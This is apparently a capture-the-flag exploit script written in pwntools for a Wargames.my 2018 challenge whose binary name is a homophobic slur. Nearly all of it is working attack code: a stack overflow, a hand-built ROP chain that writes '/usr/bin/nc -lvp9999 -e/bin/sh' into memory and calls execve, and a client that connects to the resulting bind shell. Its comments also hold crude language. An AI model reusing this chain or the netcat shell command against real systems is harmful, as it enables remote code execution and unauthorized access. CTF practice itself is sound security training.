POC for Wargames.my 2018's faggot2.0 challenge
from pwn import * | |
# Terminal pwntools opens when it spawns a debugger window; only relevant if the
# gdb.attach block further down is re-enabled.
context.terminal = 'konsole -e sh -c'.split()
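def split2len(s, n):
    """Split *s* into consecutive chunks of at most *n* items.

    Works on any sliceable sequence (str, bytes, list). The last chunk is
    shorter when len(s) is not a multiple of n; an empty *s* gives [].

    Raises:
        ValueError: if n <= 0. The previous while-loop version never
            terminated for such n because s[:n] / s[n:] never consumed
            the input.
    """
    if n <= 0:
        raise ValueError("chunk size must be positive, got %r" % (n,))
    # %-formatting rather than f-strings on purpose: the rest of the file is
    # written for Python 2 (str payloads concatenated with p64 output).
    return [s[i:i + n] for i in range(0, len(s), n)]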
''' | |
START BUILDING OUR ROP CHAINS | |
''' | |
def write(addr, data):
    '''Build the ROP fragment that stores the bytes of `data` at `addr`.

    `data` is consumed in 4-byte chunks (split2len) because the store
    gadget used here writes a dword (eax), so every chunk costs five 8-byte
    slots in the chain. The gadget addresses are hard-coded for the
    challenge binary (presumably non-PIE, given the absolute 0x400xxx
    values).

    A NUL terminator is only written when the last chunk is shorter than 4
    bytes (it comes from the ljust padding); for lengths that are a
    multiple of 4 the code relies on the destination already holding
    zeros -- TODO confirm for the target region.

    The chain is assembled by str concatenation, so this assumes a Python 2
    pwntools where p64() returns str; on Python 3 the '' + bytes mix raises
    TypeError.

    Args:
        addr: address of the first byte to write.
        data: str to write.
    Returns:
        The payload fragment (str).
    '''
    addr = addr + 8 # to suit [rbp-8]: the store gadget writes to rbp-8
    payload = ''
    for each in split2len(data, 4):
        payload += p64(0x400840) # pop rbp; ret;
        payload += p64(addr) # rbp = addr
        payload += p64(0x4009d2) # pop rax; ret;
        payload += each.ljust(8, '\x00') # rax = string chunk with left 0x0 padding (only the low dword is stored)
        payload += p64(0x4009cf) # mov dword ptr [rbp - 8], eax; pop rax; ret;
        payload += 'junk'*2 # consumed by the trailing `pop rax` of the store gadget
        addr += 4 # one dword stored per iteration
    return payload
# ROP addresses
WRITABLE_ADDR = 0x602000 # scratch area the chain writes into; advanced as each string is placed
payload = 'A'*152 # padding before return address overwrite
exec_code = '/usr/bin/nc -lvp9999 -e/bin/sh'.split(' ')
# write `exec_code` into writable section
# Each argv string is written back-to-back from WRITABLE_ADDR; `addr` records
# where each one landed so the argv[] pointer array can be built afterwards.
addr = []
for each in exec_code:
    payload += write(WRITABLE_ADDR, each)
    addr.append(WRITABLE_ADDR)
    WRITABLE_ADDR += len(each) + 1 # +1 leaves one byte between strings for the NUL terminator
# write addresses into memory to mimic argv[], for our execve() friend
# NULL entry ends the pointer array; WRITABLE_ADDR is now the address of argv[]
# itself and is not advanced further (it is loaded into rsi below).
addr.append(0x0)
payload += write(WRITABLE_ADDR, ''.join([p64(each) for each in addr]))
''' | |
ref: http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ | |
sys_execve (rax = 51) | |
1st param (rdi) = const char *filename) | |
2nd param (rsi) = const char *const argv[] | |
3rd param (rdx) = const char *const envp[] | |
''' | |
# prepare rsi
# rsi = argv: the pointer array written just above starts at WRITABLE_ADDR.
payload += p64(0x400ba1) # pop rsi; pop r15; ret;
payload += p64(WRITABLE_ADDR)
payload += 'junk'*2 # consumed by the extra `pop r15`
# prepare rdi
# rdi = filename: addr[0] is where the first argv string was written.
payload += p64(0x400ba3) # pop rdi; ret;
payload += p64(addr[0])
# prepare rax
payload += p64(0x4009d2) # pop rax; ret;
payload += p64(59) # execve in the x86_64 table (the reference block above says 51; 59 is what the chain uses)
# get shell, bitch!
# NOTE(review): rdx (envp) is never set by this chain, so execve receives
# whatever rdx holds at the syscall -- presumably relied on to be NULL or
# harmless; confirm.
payload += p64(0x4009d4) # syscall -> execve("nc", {"nc", "-lvp9999", "-e/bin/sh", NULL}, envp);
# end peacefully | |
''' | |
payload += p64(0x400ba3) # pop rdi; ret; | |
payload += p64(0x0) | |
payload += p64(0x4009d2) # pop rax; ret; | |
payload += p64(60) | |
payload += p64(0x4009d4) # syscall -> exit(0) | |
''' | |
''' | |
END BUILDING OUR ROP CHAINS | |
''' | |
# NOTE(review): `p` is only referenced by the commented-out gdb.attach block
# below; with that disabled this spawns a child process that is never used.
p = process('./faggot2.0')
"""
gdb.attach(p, '''
set follow-fork-mode child
break *0x4008D6
break *0x40091C
continue
''')
"""
print(payload) # dumps the raw chain (binary, Python 2 str) to stdout
# The service is sent a length line first, then the payload itself --
# presumably how the target reads its input; confirm against the binary.
r = remote('127.0.0.1', 31337)
r.sendline(str(len(payload)))
r.sendline(payload)
# wait for netcat
sleep(5)
r2 = remote('127.0.0.1', 9999)
r2.interactive()